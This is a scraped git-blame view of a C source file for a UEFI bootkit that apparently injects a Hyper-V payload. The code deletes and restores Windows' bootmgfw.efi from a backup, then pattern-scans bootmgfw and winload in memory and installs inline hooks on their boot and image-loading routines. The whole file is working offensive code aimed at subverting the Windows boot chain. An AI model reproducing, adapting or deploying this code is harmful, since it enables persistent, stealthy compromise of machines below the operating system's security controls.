You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
188 lines
6.3 KiB
188 lines
6.3 KiB
4 years ago
|
#include "BootMgfw.h"
|
||
|
|
||
|
SHITHOOK BootMgfwShitHook;
|
||
4 years ago
|
EFI_STATUS EFIAPI RestoreBootMgfw(VOID)
|
||
4 years ago
|
{
|
||
|
UINTN HandleCount = NULL;
|
||
|
EFI_STATUS Result;
|
||
|
EFI_HANDLE* Handles = NULL;
|
||
|
EFI_FILE_HANDLE VolumeHandle;
|
||
|
EFI_FILE_HANDLE BootMgfwHandle;
|
||
|
EFI_FILE_IO_INTERFACE* FileSystem = NULL;
|
||
|
|
||
|
if (EFI_ERROR((Result = gBS->LocateHandleBuffer(ByProtocol, &gEfiSimpleFileSystemProtocolGuid, NULL, &HandleCount, &Handles))))
|
||
|
{
|
||
4 years ago
|
DBG_PRINT("error getting file system handles -> 0x%p\n", Result);
|
||
|
return Result;
|
||
4 years ago
|
}
|
||
|
|
||
4 years ago
|
for (UINT32 Idx = 0u; Idx < HandleCount; ++Idx)
|
||
4 years ago
|
{
|
||
|
if (EFI_ERROR((Result = gBS->OpenProtocol(Handles[Idx], &gEfiSimpleFileSystemProtocolGuid, (VOID**)&FileSystem, gImageHandle, NULL, EFI_OPEN_PROTOCOL_GET_PROTOCOL))))
|
||
|
{
|
||
4 years ago
|
DBG_PRINT("error opening protocol -> 0x%p\n", Result);
|
||
|
return Result;
|
||
4 years ago
|
}
|
||
|
|
||
|
if (EFI_ERROR((Result = FileSystem->OpenVolume(FileSystem, &VolumeHandle))))
|
||
|
{
|
||
4 years ago
|
DBG_PRINT("error opening file system -> 0x%p\n", Result);
|
||
|
return Result;
|
||
4 years ago
|
}
|
||
|
|
||
4 years ago
|
if (!EFI_ERROR((Result = VolumeHandle->Open(VolumeHandle, &BootMgfwHandle, WINDOWS_BOOTMGFW_PATH, EFI_FILE_MODE_READ, EFI_FILE_READ_ONLY))))
|
||
4 years ago
|
{
|
||
4 years ago
|
VolumeHandle->Close(VolumeHandle);
|
||
4 years ago
|
EFI_FILE_PROTOCOL* BootMgfwFile = NULL;
|
||
|
EFI_DEVICE_PATH* BootMgfwPathProtocol = FileDevicePath(Handles[Idx], WINDOWS_BOOTMGFW_PATH);
|
||
|
|
||
4 years ago
|
// open bootmgfw as read/write then delete it...
|
||
4 years ago
|
if (EFI_ERROR((Result = EfiOpenFileByDevicePath(&BootMgfwPathProtocol, &BootMgfwFile, EFI_FILE_MODE_WRITE | EFI_FILE_MODE_READ, NULL))))
|
||
|
{
|
||
|
DBG_PRINT("error opening bootmgfw... reason -> %r\n", Result);
|
||
|
return Result;
|
||
|
}
|
||
|
|
||
|
if (EFI_ERROR((Result = BootMgfwFile->Delete(BootMgfwFile))))
|
||
|
{
|
||
|
DBG_PRINT("error deleting bootmgfw... reason -> %r\n", Result);
|
||
|
return Result;
|
||
|
}
|
||
|
|
||
4 years ago
|
// open bootmgfw.efi.backup
|
||
4 years ago
|
BootMgfwPathProtocol = FileDevicePath(Handles[Idx], WINDOWS_BOOTMGFW_BACKUP_PATH);
|
||
|
if (EFI_ERROR((Result = EfiOpenFileByDevicePath(&BootMgfwPathProtocol, &BootMgfwFile, EFI_FILE_MODE_WRITE | EFI_FILE_MODE_READ, NULL))))
|
||
|
{
|
||
|
DBG_PRINT("failed to open backup file... reason -> %r\n", Result);
|
||
|
return Result;
|
||
|
}
|
||
|
|
||
|
EFI_FILE_INFO* FileInfoPtr = NULL;
|
||
|
UINTN FileInfoSize = NULL;
|
||
4 years ago
|
|
||
|
// get the size of bootmgfw.efi.backup...
|
||
4 years ago
|
if (EFI_ERROR((Result = BootMgfwFile->GetInfo(BootMgfwFile, &gEfiFileInfoGuid, &FileInfoSize, NULL))))
|
||
|
{
|
||
|
if (Result == EFI_BUFFER_TOO_SMALL)
|
||
|
{
|
||
|
gBS->AllocatePool(EfiBootServicesData, FileInfoSize, &FileInfoPtr);
|
||
|
if (EFI_ERROR(Result = BootMgfwFile->GetInfo(BootMgfwFile, &gEfiFileInfoGuid, &FileInfoSize, FileInfoPtr)))
|
||
|
{
|
||
|
DBG_PRINT("get backup file information failed... reason -> %r\n", Result);
|
||
|
return Result;
|
||
|
}
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
DBG_PRINT("Failed to get file information... reason -> %r\n", Result);
|
||
|
return Result;
|
||
|
}
|
||
|
}
|
||
4 years ago
|
|
||
4 years ago
|
VOID* BootMgfwBuffer = NULL;
|
||
4 years ago
|
UINTN BootMgfwSize = FileInfoPtr->FileSize;
|
||
4 years ago
|
gBS->AllocatePool(EfiBootServicesData, FileInfoPtr->FileSize, &BootMgfwBuffer);
|
||
|
|
||
4 years ago
|
// read the backup file into an allocated pool...
|
||
4 years ago
|
if (EFI_ERROR((Result = BootMgfwFile->Read(BootMgfwFile, &BootMgfwSize, BootMgfwBuffer))))
|
||
|
{
|
||
|
DBG_PRINT("Failed to read backup file into buffer... reason -> %r\n", Result);
|
||
|
return Result;
|
||
|
}
|
||
|
|
||
4 years ago
|
// delete the backup file...
|
||
4 years ago
|
if (EFI_ERROR((Result = BootMgfwFile->Delete(BootMgfwFile))))
|
||
|
{
|
||
|
DBG_PRINT("unable to delete backup file... reason -> %r\n", Result);
|
||
|
return Result;
|
||
|
}
|
||
|
|
||
4 years ago
|
// create a new bootmgfw file...
|
||
4 years ago
|
BootMgfwPathProtocol = FileDevicePath(Handles[Idx], WINDOWS_BOOTMGFW_PATH);
|
||
|
if (EFI_ERROR((Result = EfiOpenFileByDevicePath(&BootMgfwPathProtocol, &BootMgfwFile, EFI_FILE_MODE_CREATE | EFI_FILE_MODE_WRITE | EFI_FILE_MODE_READ, EFI_FILE_SYSTEM))))
|
||
|
{
|
||
|
DBG_PRINT("unable to create new bootmgfw on disk... reason -> %r\n", Result);
|
||
|
return Result;
|
||
|
}
|
||
|
|
||
4 years ago
|
// write the data from the backup file to the new bootmgfw file...
|
||
4 years ago
|
BootMgfwSize = FileInfoPtr->FileSize;
|
||
|
if (EFI_ERROR((Result = BootMgfwFile->Write(BootMgfwFile, &BootMgfwSize, BootMgfwBuffer))))
|
||
|
{
|
||
|
DBG_PRINT("unable to write to newly created bootmgfw.efi... reason -> %r\n", Result);
|
||
|
return Result;
|
||
|
}
|
||
|
|
||
|
BootMgfwFile->Close(BootMgfwFile);
|
||
|
gBS->FreePool(FileInfoPtr);
|
||
|
gBS->FreePool(BootMgfwBuffer);
|
||
4 years ago
|
return EFI_SUCCESS;
|
||
|
}
|
||
4 years ago
|
|
||
|
if (EFI_ERROR((Result = gBS->CloseProtocol(Handles[Idx], &gEfiSimpleFileSystemProtocolGuid, gImageHandle, NULL))))
|
||
|
{
|
||
4 years ago
|
DBG_PRINT("error closing protocol -> 0x%p\n", Result);
|
||
|
return Result;
|
||
4 years ago
|
}
|
||
|
}
|
||
4 years ago
|
|
||
|
gBS->FreePool(Handles);
|
||
4 years ago
|
return EFI_ABORTED;
|
||
4 years ago
|
}
|
||
|
|
||
|
EFI_STATUS EFIAPI InstallBootMgfwHooks(EFI_HANDLE BootMgfwPath)
|
||
|
{
|
||
|
EFI_STATUS Result = EFI_SUCCESS;
|
||
|
EFI_LOADED_IMAGE* BootMgfw = NULL;
|
||
|
|
||
|
if (EFI_ERROR((Result = gBS->HandleProtocol(BootMgfwPath, &gEfiLoadedImageProtocolGuid, (VOID**)&BootMgfw))))
|
||
|
return Result;
|
||
|
|
||
|
Print(L"Image Base -> 0x%p\n", BootMgfw->ImageBase);
|
||
|
Print(L"Image Size -> 0x%x\n", BootMgfw->ImageSize);
|
||
|
VOID* ArchStartBootApplication =
|
||
|
FindPattern(
|
||
|
BootMgfw->ImageBase,
|
||
|
BootMgfw->ImageSize,
|
||
4 years ago
|
START_BOOT_APPLICATION_SIG,
|
||
|
START_BOOT_APPLICATION_MASK
|
||
4 years ago
|
);
|
||
|
|
||
4 years ago
|
if (!ArchStartBootApplication)
|
||
|
return EFI_ABORTED;
|
||
|
|
||
4 years ago
|
DBG_PRINT(L"ArchStartBootApplication -> 0x%p\n", ArchStartBootApplication);
|
||
4 years ago
|
MakeShitHook(&BootMgfwShitHook, ArchStartBootApplication, &ArchStartBootApplicationHook, TRUE);
|
||
|
return Result;
|
||
|
}
|
||
|
|
||
|
EFI_STATUS EFIAPI ArchStartBootApplicationHook(VOID* AppEntry, VOID* ImageBase, UINT32 ImageSize, UINT8 BootOption, VOID* ReturnArgs)
|
||
|
{
|
||
|
DisableShitHook(&BootMgfwShitHook);
|
||
|
VOID* LdrLoadImage = GetExport(ImageBase, "BlLdrLoadImage");
|
||
|
VOID* ImgAllocateImageBuffer =
|
||
|
FindPattern(
|
||
|
ImageBase,
|
||
|
ImageSize,
|
||
|
ALLOCATE_IMAGE_BUFFER_SIG,
|
||
4 years ago
|
ALLOCATE_IMAGE_BUFFER_MASK
|
||
4 years ago
|
);
|
||
|
|
||
4 years ago
|
Print(L"Hyper-V PayLoad Size -> 0x%x\n", PayLoadSize());
|
||
4 years ago
|
Print(L"winload base -> 0x%p\n", ImageBase);
|
||
|
Print(L"winload size -> 0x%x\n", ImageSize);
|
||
|
Print(L"winload.BlLdrLoadImage -> 0x%p\n", LdrLoadImage);
|
||
|
Print(L"winload.BlImgAllocateImageBuffer -> 0x%p\n", ImgAllocateImageBuffer);
|
||
4 years ago
|
|
||
|
if (ImgAllocateImageBuffer && LdrLoadImage)
|
||
|
{
|
||
|
MakeShitHook(&WinLoadImageShitHook, LdrLoadImage, &BlLdrLoadImage, TRUE);
|
||
|
MakeShitHook(&WinLoadAllocateImageHook, ImgAllocateImageBuffer, &BlImgAllocateImageBuffer, TRUE);
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
Print(L"nullptr detected, aborting...\n");
|
||
|
Print(L"Please submit a screenshot of this...\n");
|
||
|
}
|
||
4 years ago
|
return ((IMG_ARCH_START_BOOT_APPLICATION)BootMgfwShitHook.Address)(AppEntry, ImageBase, ImageSize, BootOption, ReturnArgs);
|
||
|
}
|